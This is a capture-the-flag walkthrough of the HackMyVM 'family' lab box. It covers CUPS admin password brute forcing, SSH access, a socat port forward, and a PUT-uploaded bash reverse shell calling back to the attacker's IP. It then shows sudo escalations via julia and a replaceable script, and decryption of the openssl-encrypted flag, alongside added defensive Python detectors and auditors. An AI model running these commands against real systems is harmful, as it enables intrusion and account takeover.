
HMV-family3

HMV-family3 box walkthrough

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap 192.168.58.62
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-07 17:01 CST
Nmap scan report for bogon (192.168.58.62)
Host is up (0.0069s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
631/tcp open ipp
MAC Address: C8:21:58:16:CF:C4 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 6.17 seconds

Here a port I had not seen much before showed up, 631. I looked up what the ipp service is:
The Internet Printing Protocol (IPP), as specified in RFC 2910 and RFC 2911, is the foundation of printing over the Internet. Its extensibility is shown by developments such as IPP Everywhere, which aims to standardize mobile and cloud printing and introduces extensions for 3D printing. Because it builds on HTTP, IPP benefits from established security practices, including Basic/Digest authentication and SSL/TLS encryption. Operations such as submitting a print job or querying printer status are carried out through HTTP POST requests to the IPP server, which runs on port 631/tcp.
A well-known implementation of IPP is CUPS, an open-source printing system used widely across Linux distributions and OS X. Despite its usefulness, IPP, like LPD, can be abused to deliver malicious content through PostScript or PJL files, which highlights a potential security risk.

So it is a print service with known vulnerabilities.
Since it is an HTTP-based service, it is still worth visiting the web page.

Web probing


This is an IPP server. After searching for CUPS vulnerabilities I found the ID CVE-2024-47177, and then found an exploit script on GitHub: https://github.com/vulhub/evil-ipp-server
Then edit the command in the script; here I chose a reverse shell.

Then install the ippserver library.

┌──(root㉿kakeru)-[~/tmp]
└─# pip3 install ippserver --break-system-packages
Requirement already satisfied: ippserver in /usr/local/lib/python3.12/dist-packages (0.2)
Requirement already satisfied: requests in /usr/lib/python3/dist-packages (from ippserver) (2.32.3)
Requirement already satisfied: certifi>=2017.4.17 in /usr/lib/python3/dist-packages (from requests->ippserver) (2024.12.14)
Requirement already satisfied: charset-normalizer<4,>=2 in /usr/lib/python3/dist-packages (from requests->ippserver) (3.4.0)
Requirement already satisfied: idna<4,>=2.5 in /usr/lib/python3/dist-packages (from requests->ippserver) (3.8)
Requirement already satisfied: urllib3<3,>=1.21.1 in /usr/lib/python3/dist-packages (from requests->ippserver) (2.2.3)
WARNING: Running pip as the 'root' user can result in broken permissions and conflicting behaviour with the system package manager, possibly rendering your system unusable.It is recommended to use a virtual environment instead: https://pip.pypa.io/warnings/venv. Use the --root-user-action option if you know what you are doing and want to suppress this warning.

┌──(root㉿kakeru)-[~/tmp]
└─# python3 41777.py 192.168.58.11 192.168.58.62

After running the command, an extra entry shows up in the printer list: that is our attacking IP.

But after trying for a long time the shell still would not come back. I checked the walkthrough and found I had gone down the wrong path.
This site has an admin page, and the username and password need to be brute-forced.

We already know the username mum, so brute-force it with wfuzz.
I first intercepted with Burp and saw that the login page sends a POST request, and the parameters are already known.

┌──(root㉿kakeru)-[~/tmp]
└─# wfuzz -c -u http://192.168.58.62:631/admin/ --basic mum:FUZZ -w rockyou.txt -b 'org.cups.sid=f78970dc2347a763ec24e09c013d76bb' -d "org.cups.sid=df16eb974ff8e01177f03fafe7aa2887&OP=add-printer" -Z --hc 401
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.58.62:631/admin/
Total requests: 14344392

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 100 L 331 W 4618 Ch "123456"
000000003: 200 100 L 331 W 4618 Ch "123456789"
000000050: 200 100 L 331 W 4618 Ch "hannah"
000000049: 200 100 L 331 W 4618 Ch "superman"
000000046: 200 100 L 331 W 4618 Ch "joshua"
000000007: 200 100 L 331 W 4618 Ch "1234567"
000000015: 200 100 L 331 W 4618 Ch "lovely"
000000047: 200 100 L 331 W 4618 Ch "bubbles"
000000048: 200 100 L 331 W 4618 Ch "1234567890"
000000031: 200 100 L 331 W 4618 Ch "friends"
000000045: 200 100 L 331 W 4618 Ch "jennifer"
000000038: 200 100 L 331 W 4618 Ch "loveme"
000000041: 200 100 L 331 W 4618 Ch "football"
000000036: 200 100 L 331 W 4618 Ch "liverpool"
000000043: 200 100 L 331 W 4618 Ch "andrea"
000000040: 200 100 L 331 W 4618 Ch "123123"
000000037: 200 100 L 331 W 4618 Ch "justin"
000000044: 200 100 L 331 W 4618 Ch "carlos"
000000039: 200 100 L 331 W 4618 Ch "fuckyou"
000000042: 200 100 L 331 W 4618 Ch "secret"
000000035: 200 100 L 331 W 4618 Ch "jordan"
000000027: 200 100 L 331 W 4618 Ch "chocolate"
000000032: 200 100 L 331 W 4618 Ch "butterfly"
000000025: 200 100 L 331 W 4618 Ch "tigger"
000000033: 200 100 L 331 W 4618 Ch "purple"
000000029: 200 100 L 331 W 4618 Ch "soccer"
000000026: 200 100 L 331 W 4618 Ch "sunshine"
000000034: 200 100 L 331 W 4618 Ch "angel"
000000028: 200 100 L 331 W 4618 Ch "password1"
000000030: 200 100 L 331 W 4618 Ch "anthony"
zsh: killed wfuzz -c -u http://192.168.58.62:631/admin/ --basic mum:FUZZ -w rockyou.txt -

-c colored output; --basic takes the format "user:pass" or "FUZZ:FUZZ"; -b sets the cookie; -Z scan mode; -d sends POST data (for example "id=FUZZ&catalog=1")
But the scan returned many hits, so take the results as a dictionary and brute-force the login again with Burp.

┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp | awk '{print $9}' | tr -d '"'
123456
123456789
hannah
superman
joshua
1234567
lovely
bubbles
1234567890
friends
jennifer
loveme
football
liverpool
andrea
123123
justin
carlos
fuckyou
secret
jordan
chocolate
butterfly
tigger
purple
soccer
sunshine
angel
password1
anthony

┌──(root㉿kakeru)-[~/tmp]
└─# cat tmp | awk '{print $9}' | tr -d '"' > pass


In Burp I saw that the credentials are passed in the Basic header, base64-encoded, in the format mum:password.

Bring in the dictionary from before, add the prefix and base64-encode it; the URL-encode option at the bottom must also be turned off, because base64 contains = signs.

Successfully found the password: lovely
Log in to mum's shell

┌──(root㉿kakeru)-[~/tmp]
└─# ssh mum@192.168.58.62
The authenticity of host '192.168.58.62 (192.168.58.62)' can't be established.
ED25519 key fingerprint is SHA256:vZEvCqRgxS6H8cJ6Umlp0yPH8QAidaOqPupC9t/CPr0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.58.62' (ED25519) to the list of known hosts.
mum@192.168.58.62's password:
Linux family 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Oct 23 17:43:43 2022 from fe80::d63d:7eff:fef1:3736%enp0s3
-bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
mum@family:~$
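The Basic-auth brute force above (wfuzz, then Burp, against /admin/) is noisy on the server side: CUPS records every request in its access_log, which uses the Common Log Format followed by two IPP columns. The detector below is an added Python example and is not part of the original write-up; the log lines in it are constructed to look like that format, and the field layout, threshold and window are assumptions of the example, not CUPS defaults.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed CUPS access_log layout (Common Log Format plus two IPP columns):
#   host group user [date-time] "method resource version" status bytes ipp-op ipp-status
LINE_RE = re.compile(
    r'^(?P<host>\S+) (?P<group>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)

# Constructed sample: five rejected /admin/ logins from one client within a few
# seconds, then an accepted one, plus a single failure from another host.
SAMPLE_LOG = [
    '192.168.58.11 - - [07/Mar/2025:17:30:01 +0800] "POST /admin/ HTTP/1.1" 401 0 - -',
    '192.168.58.11 - - [07/Mar/2025:17:30:02 +0800] "POST /admin/ HTTP/1.1" 401 0 - -',
    '192.168.58.20 - - [07/Mar/2025:17:30:03 +0800] "POST /admin/ HTTP/1.1" 401 0 - -',
    '192.168.58.11 - - [07/Mar/2025:17:30:03 +0800] "POST /admin/ HTTP/1.1" 401 0 - -',
    '192.168.58.11 - - [07/Mar/2025:17:30:04 +0800] "POST /admin/ HTTP/1.1" 401 0 - -',
    '192.168.58.11 - - [07/Mar/2025:17:30:05 +0800] "POST /admin/ HTTP/1.1" 401 0 - -',
    '192.168.58.11 - mum [07/Mar/2025:17:30:07 +0800] "POST /admin/ HTTP/1.1" 200 4618 - -',
    '192.168.58.20 - - [07/Mar/2025:17:31:00 +0800] "GET / HTTP/1.1" 200 1234 - -',
]


def parse_line(line):
    """Parse one access_log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_auth_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Raise one alert per client that produces `threshold` or more 401s on
    /admin within `window`, and record the first 200 on /admin that follows:
    a success right after a burst of failures usually means a password was found."""
    recent = defaultdict(deque)   # host -> timestamps of its recent 401s
    alerts = {}                   # host -> alert dict
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/admin"):
            continue
        host, ts = rec["host"], rec["ts"]
        if rec["status"] == 401:
            q = recent[host]
            q.append(ts)
            while ts - q[0] > window:       # drop failures that fell out of the window
                q.popleft()
            if len(q) >= threshold and host not in alerts:
                alerts[host] = {"host": host, "failures": len(q),
                                "first": q[0], "last": ts, "success_after": None}
        elif rec["status"] == 200 and host in alerts and alerts[host]["success_after"] is None:
            alerts[host]["success_after"] = ts
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_auth_bruteforce(SAMPLE_LOG):
        print(f"{a['host']}: {a['failures']} failed /admin logins between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}; "
              f"success afterwards: {a['success_after']}")
```

Run against a real access_log the same logic applies line by line; the interesting signal is the 200 that follows the burst, since it tells you which client most likely has the password and when to start looking for an SSH login from the same address.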

Privilege escalation

mum

There are no files in mum's home directory, no sudo rights, and no SUID binaries either.
Going to dad's directory, there are two entries with read and execute permissions.

mum@family:/home/dad$ ls -al
total 36
drwxr-xr-x 5 dad dad 4096 Oct 25 2022 .
drwxr-xr-x 5 root root 4096 Oct 11 2022 ..
lrwxrwxrwx 1 dad dad 9 Oct 2 2022 .bash_history -> /dev/null
-rw-r--r-- 1 dad dad 220 Oct 2 2022 .bash_logout
-rw-r--r-- 1 dad dad 3526 Oct 24 2022 .bashrc
drwxr-xr-x 3 dad dad 4096 Oct 22 2022 .local
-rw-r--r-- 1 dad dad 807 Oct 2 2022 .profile
drwx------ 2 dad dad 4096 Oct 23 2022 .ssh
-rwxr-xr-x 1 dad dad 620 Oct 25 2022 project
drwxr-xr-x 2 dad dad 4096 Oct 23 2022 survey
mum@family:/home/dad$ cat project 
#! /bin/bash

find / -user mum -writable -exec rm {} \; 2>/dev/null
find / -user mum -type f -name -exec grep -il 'password' {} \; 2>/dev/null
find / -user mum -type f -name "id_rsa" 2>/dev/null
find / -user mum -type f -name "authorized_keys" 2>/dev/null
find / -mmin -30 -user mum 2>/dev/null | grep -v "/proc/*"
find /home/dad -type f ! -name "project" -user dad -executable -exec mv "{}" ~/survey \;
cat /var/mail/mum
cat /home/mum/.bash_history 2>/dev/null
cat /var/spool/cups/d0002*
for file in ~/survey/* ; do [[ -O $file ]] && bash $file 2>/dev/null ; done
strings /dev/mem -n100 | grep -i mum
who -u |grep mum

Here, if survey contains files they get executed, but right now survey holds a .py file we cannot read. Let's look at the current listening ports.

mum@family:/home/dad/survey$ ss -tulnp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:35669 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:631 0.0.0.0:*
udp UNCONN 0 0 [::]:5353 [::]:*
udp UNCONN 0 0 [::]:41905 [::]:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:631 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:8000 0.0.0.0:*
tcp LISTEN 0 128 [::]:22 [::]:*
tcp LISTEN 0 128 [::]:631 [::]:*

Here we find 127.0.0.1:8000 listening, so port 8000 is open locally only; use socat to forward it.

mum@family:~$ wget 192.168.58.11/socat
--2025-03-07 11:42:39-- http://192.168.58.11/socat
Connecting to 192.168.58.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: 'socat'

socat 100%[=========================================================================>] 366.38K 1.63MB/s in 0.2s

2025-03-07 11:42:40 (1.63 MB/s) - 'socat' saved [375176/375176]

mum@family:~$ chmod +x socat
mum@family:~$ ./socat TCP-LISTEN:8080,fork 127.0.0.1:8000
^Cmum@family:~$ ./socat TCP-LISTEN:8080,fork 127.0.0.1:8000 ^C
mum@family:~$ ./socat TCP-LISTEN:8080,fork 127.0.0.1:8000 &
[1] 34365

Forward 127.0.0.1:8000 to port 8080, with & to keep it running in the background.
Now visiting port 8080 reaches something, although here it returns an empty reply.

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.58.62:8080
curl: (52) Empty reply from server

The tricky point here is how to write a file into the survey directory, since project executes every file under survey.
Here I ran a nikto scan against it.

┌──(root㉿kakeru)-[~/tmp]
└─# nikto -h 192.168.58.39:8080
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.58.39
+ Target Hostname: 192.168.58.39
+ Target Port: 8080
+ Start Time: 2025-03-07 19:20:02 (GMT8)
---------------------------------------------------------------------------
+ Server: SimpleHTTP/0.6 Python/2.7.18
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Python/2.7.18 appears to be outdated (current is at least 3.9.6).
+ SimpleHTTP/0.6 appears to be outdated (current is at least 1.2).

mum@family:/home/dad/survey$ ls
index.html nikto-test-LsluKoIs.html server.py

The result: a new file, nikto-test-LsluKoIs.html, appeared under survey. Nikto tries to upload a file during its scan, so this service allows file uploads.
So use a PUT request to upload a .sh file containing a reverse shell.

┌──(root㉿kakeru)-[~/tmp]
└─# curl -X PUT 192.168.58.39:8080/reverse -d "bash -i >& /dev/tcp/192.168.58.11/1234 0>&1"
curl: (52) Empty reply from server

mum@family:/home/dad$ ./project

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234
id
id
bash: cannot set terminal process group (5833): Inappropriate ioctl for device
bash: no job control in this shell
dad@family:~$ id
uid=1000(dad) gid=1000(dad) groups=1000(dad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
dad@family:~$ id
uid=1000(dad) gid=1000(dad) groups=1000(dad),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth)
dad@family:~$
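The chain that yields dad's shell above has two weak links: an HTTP service that accepts PUT and writes the request body into a directory, and a script (project) that runs bash on every file it finds there. The Python below is an added example and is not the box's server.py, whose source the write-up never shows; the permissive handler is a hypothetical reconstruction of the observed behaviour, placed beside a read-only handler that refuses write methods, with a small harness that sends the same PUT to each and reports whether a file landed on disk.

```python
import functools
import http.client
import os
import tempfile
import threading
from http.server import HTTPServer, SimpleHTTPRequestHandler


class PermissivePutHandler(SimpleHTTPRequestHandler):
    """Hypothetical reconstruction (not the box's server.py): the PUT body is
    written to a file named after the URL path inside the served directory, so
    anyone who can reach the port can drop files there."""

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        target = os.path.join(self.directory, self.path.lstrip("/"))
        with open(target, "wb") as fh:
            fh.write(body)
        self.send_response(201)
        self.end_headers()

    def log_message(self, *args):      # keep the example quiet
        pass


class ReadOnlyHandler(SimpleHTTPRequestHandler):
    """Hardened variant: GET/HEAD only; every write method is refused with 405."""

    def do_PUT(self):
        self.send_error(405, "Method Not Allowed")

    do_POST = do_DELETE = do_PUT

    def log_message(self, *args):
        pass


def serve_and_put(handler_cls, directory, name, body):
    """Start handler_cls on an ephemeral loopback port serving `directory`,
    send one PUT /name carrying `body`, stop the server, and return
    (HTTP status, whether `name` now exists inside `directory`)."""
    handler = functools.partial(handler_cls, directory=directory)
    server = HTTPServer(("127.0.0.1", 0), handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
        conn.request("PUT", "/" + name, body=body)
        status = conn.getresponse().status
        conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return status, os.path.exists(os.path.join(directory, name))


def demo():
    """Constructed scenario: the same PUT against both handlers, each serving
    a fresh temporary directory standing in for the survey directory."""
    results = {}
    for label, cls in (("permissive", PermissivePutHandler), ("readonly", ReadOnlyHandler)):
        with tempfile.TemporaryDirectory() as survey_dir:
            results[label] = serve_and_put(cls, survey_dir, "dropped.sh", b"echo constructed\n")
    return results


if __name__ == "__main__":
    for label, (status, written) in demo().items():
        print(f"{label:10s} -> HTTP {status}, file written: {written}")
```

The second link matters just as much: even with the read-only handler, a script that executes whatever it finds in a directory should only run files it created itself, and the directory should not be writable by any other process, network-facing or not.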

dad

dad@family:~$ sudo -l
Matching Defaults entries for dad on family:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dad may run the following commands on family:
(baby) NOPASSWD: /usr/bin/julia

Found the escalation method on GTFOBins: sudo julia -e 'run(`/bin/sh`)'
Got baby's shell.

baby

b👶by@family:~$ sudo -l
Matching Defaults entries for baby on family:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User baby may run the following commands on family:
(root) NOPASSWD: /home/baby/chocapic

baby has a file in its own home directory that it may run with sudo. Because the file lives in baby's own home directory, it can simply be deleted and recreated.

b👶by@family:~$ rm chocapic
rm: remove write-protected regular file 'chocapic'? y
b👶by@family:~$ ls
user.txt
b👶by@family:~$ echo "/bin/bash -p" > chocapic
b👶by@family:~$ chmod +x chocapic
b👶by@family:~$ sudo /home/baby/chocapic
bash: warning: setlocale: LC_ALL: cannot change locale (en_US.UTF-8)
root@family:/home/baby#

Got root.
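Both sudo rules on this box share the pattern that makes them exploitable: julia is an interpreter, so letting dad run it as baby is the same as letting dad run anything as baby, and chocapic lives in baby's own home directory, so baby can replace it before root runs it. The checker below is an added Python example, not anything from the box: it parses sudo -l style lines (the two rules printed on this page are its sample input) and flags those patterns. The interpreter list and the "user-controlled location" prefixes are assumptions of the example, not a complete catalogue.

```python
import os
import re
import tempfile

# One rule line as printed by `sudo -l`, e.g. "    (baby) NOPASSWD: /usr/bin/julia"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?:(?P<tags>[A-Z]+(?:\s*,\s*[A-Z]+)*):\s*)?(?P<cmd>\S+)"
)

# Assumed lists: interpreters that turn "may run X" into "may run anything",
# and directory prefixes an unprivileged user normally controls.
INTERPRETERS = {"julia", "python", "python2", "python3", "perl", "ruby", "node",
                "bash", "sh", "zsh", "lua", "php"}
USER_CONTROLLED_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# The two rules from this page, plus the header lines sudo prints around them.
SAMPLE_RULES = [
    "User dad may run the following commands on family:",
    "    (baby) NOPASSWD: /usr/bin/julia",
    "User baby may run the following commands on family:",
    "    (root) NOPASSWD: /home/baby/chocapic",
]


def audit_rule(line, check_fs=False):
    """Return None for non-rule lines, else the parsed rule plus a list of
    findings. With check_fs=True the real filesystem is consulted: a target the
    current user may overwrite, or whose directory the current user may write
    (so the file can be deleted and recreated), is flagged."""
    m = RULE_RE.match(line)
    if m is None:
        return None
    runas, tags, cmd = m.group("runas"), m.group("tags") or "", m.group("cmd")
    findings = []
    if "NOPASSWD" in tags:
        findings.append("nopasswd")
    if not cmd.startswith("/"):
        findings.append("relative-path")
    if os.path.basename(cmd) in INTERPRETERS:
        findings.append("interpreter")
    if cmd.startswith(USER_CONTROLLED_PREFIXES):
        findings.append("user-controlled-location")
    if check_fs:
        if not os.path.exists(cmd):
            findings.append("path-missing")
        elif os.access(cmd, os.W_OK) or os.access(os.path.dirname(cmd), os.W_OK):
            findings.append("writable-by-current-user")
    return {"runas": runas, "cmd": cmd, "findings": findings}


def audit_sudo_output(lines, check_fs=False):
    """Audit every rule line in a `sudo -l` listing, skipping the other lines."""
    results = [audit_rule(line, check_fs) for line in lines]
    return [r for r in results if r is not None]


def demo_writable_check():
    """Constructed case for check_fs: a sudo target inside a directory the
    current user owns, which is exactly the chocapic situation."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "script")
        open(target, "w").close()
        return audit_rule(f"(root) NOPASSWD: {target}", check_fs=True)["findings"]


if __name__ == "__main__":
    for r in audit_sudo_output(SAMPLE_RULES):
        print(f"({r['runas']}) {r['cmd']}: {', '.join(r['findings']) or 'ok'}")
    print("temp-dir target:", demo_writable_check())
```

The fix on the admin side is the mirror image of the findings: sudo targets belong in root-owned directories with root-owned files, and a rule should name a specific, non-interpreter binary with fixed arguments rather than a language runtime.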

root

On this box getting root is not enough; the flag cannot be read directly.

root@family:/home/baby# cd 
root@family:~# ls
root.txt
root@family:~# cat root.txt
Salted__"?1լ???Ȉ?m?:Pi?|q?8FH?yNU:k?.ᛥ?24?}??;E?$/7root@family:~#
root@family:~# file root.txt
root.txt: openssl enc'd data with salted password

This is data encrypted with openssl using a salted password.
That means there is more information somewhere. I learned something new here: you can also look at the disks, and this box has another one. Use fdisk -l.

root@family:~# fdisk -l
Disk /dev/sda: 15.26 GiB, 16385299968 bytes, 32002539 sectors
Disk model: VBOX HARDDISK
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb6ff27bb

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 27897855 27895808 13.3G 83 Linux
/dev/sda2 27899902 29898751 1998850 976M 5 Extended
/dev/sda3 29898752 32002047 2103296 1G 83 Linux
/dev/sda5 27899904 29898751 1998848 976M 82 Linux swap / Solaris

There is another partition, /dev/sda3.

root@family:~# mount /dev/sda3 /mnt
root@family:~# cd /mnt
root@family:/mnt# ls
password
root@family:/mnt# cat password
QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma

After mounting sda3 at /mnt, I found a password, but it is not root's password; it should be the openssl password.

root@family:~# openssl enc -d -aes-256-cbc -in root.txt -k QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
139669560771904:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:

Trying it directly, it says to use -pbkdf2.

root@family:~# openssl enc -d -aes-256-cbc -in root.txt -k QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma -pbkdf2
G??Ʋ.?
??`?͙???"?"
bad decrypt
139681936713024:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:../crypto/evp/evp_enc.c:610:
-c???=root@family:~#

Still no good; finally switching the key size from 256 to 128 made it work.

root@family:~# openssl enc -d -aes-128-cbc -in root.txt -k QHSvtnwvnUgKRGDQfG6rC58bAU4woNIW0Z7eL6ma -pbkdf2
8d8ff4976efccbfc8ff7d7554b9239e5
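The three openssl runs above fail for two different reasons: the first uses the legacy key derivation (the "deprecated key derivation" warning), the second uses PBKDF2 but the wrong cipher, so in both cases the derived key and IV are wrong and the CBC padding check reports "bad decrypt". The Python below is an added example, not part of the write-up: it parses the Salted__ header that openssl enc writes and reimplements both key derivations with hashlib, so the difference between the attempts is visible. The blob and password are constructed; the PBKDF2 parameters are openssl's defaults for -pbkdf2 without -iter or -md (HMAC-SHA256, 10000 iterations), and no AES decryption is performed here.

```python
import hashlib

MAGIC = b"Salted__"
# key length and IV length in bytes for the two ciphers tried on this page
CIPHERS = {"aes-128-cbc": (16, 16), "aes-256-cbc": (32, 16)}


def parse_salted_blob(blob):
    """Split `openssl enc -salt` output into (salt, ciphertext):
    8 bytes "Salted__", 8 bytes of random salt, then the ciphertext."""
    if len(blob) < 16 or not blob.startswith(MAGIC):
        raise ValueError("not an OpenSSL Salted__ blob")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password, salt, key_len, iv_len):
    """Legacy OpenSSL KDF (EVP_BytesToKey with MD5, one iteration), the
    'deprecated key derivation' openssl warns about. Each MD5 block hashes the
    previous block + password + salt; the output is cut into key, then IV."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.md5(prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def pbkdf2_key_iv(password, salt, key_len, iv_len, iterations=10000):
    """What `openssl enc -pbkdf2` does with its defaults: PBKDF2-HMAC-SHA256,
    10000 iterations, one derived string cut into key, then IV."""
    out = hashlib.pbkdf2_hmac("sha256", password, salt, iterations, key_len + iv_len)
    return out[:key_len], out[key_len:key_len + iv_len]


def derive(cipher, password, salt, pbkdf2=True):
    """Key and IV that `openssl enc -<cipher> -k <password>` would use."""
    key_len, iv_len = CIPHERS[cipher]
    kdf = pbkdf2_key_iv if pbkdf2 else evp_bytes_to_key
    return kdf(password, salt, key_len, iv_len)


# Constructed sample: a fixed salt and two all-zero blocks standing in for real ciphertext.
SAMPLE_BLOB = MAGIC + bytes(range(8)) + bytes(32)
SAMPLE_PASSWORD = b"constructed-password"


def compare_attempts(blob=SAMPLE_BLOB, password=SAMPLE_PASSWORD):
    """Mirror the page's three attempts and return the (key, iv) each one uses."""
    salt, _ = parse_salted_blob(blob)
    return {
        "aes-256-cbc legacy": derive("aes-256-cbc", password, salt, pbkdf2=False),
        "aes-256-cbc pbkdf2": derive("aes-256-cbc", password, salt),
        "aes-128-cbc pbkdf2": derive("aes-128-cbc", password, salt),
    }


if __name__ == "__main__":
    for label, (key, iv) in compare_attempts().items():
        print(f"{label:20s} key={key.hex()} iv={iv.hex()}")
```

Two things worth noticing in the output: both KDFs are prefix-consistent, so the aes-128 key is the first half of the aes-256 key and the aes-128 IV is its second half, which is why the wrong cipher is not "almost right" but simply wrong; and nothing in the Salted__ header records which cipher or KDF was used, so the decrypting side has to know or guess them, exactly as the page did.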

Summary

  • This box taught me a new service, IPP, and that this service has vulnerabilities.
  • Learned the wfuzz scanning approach.
  • When a user has nothing of their own, go look in other users' directories for executable files.
  • If a file in your own home directory has sudo rights, just delete it and create a new one to escalate.
  • Learned the df -h and fdisk -l commands, two disk-related commands; there may be information on a different disk.
  • Finally, learned how openssl encryption and decryption work.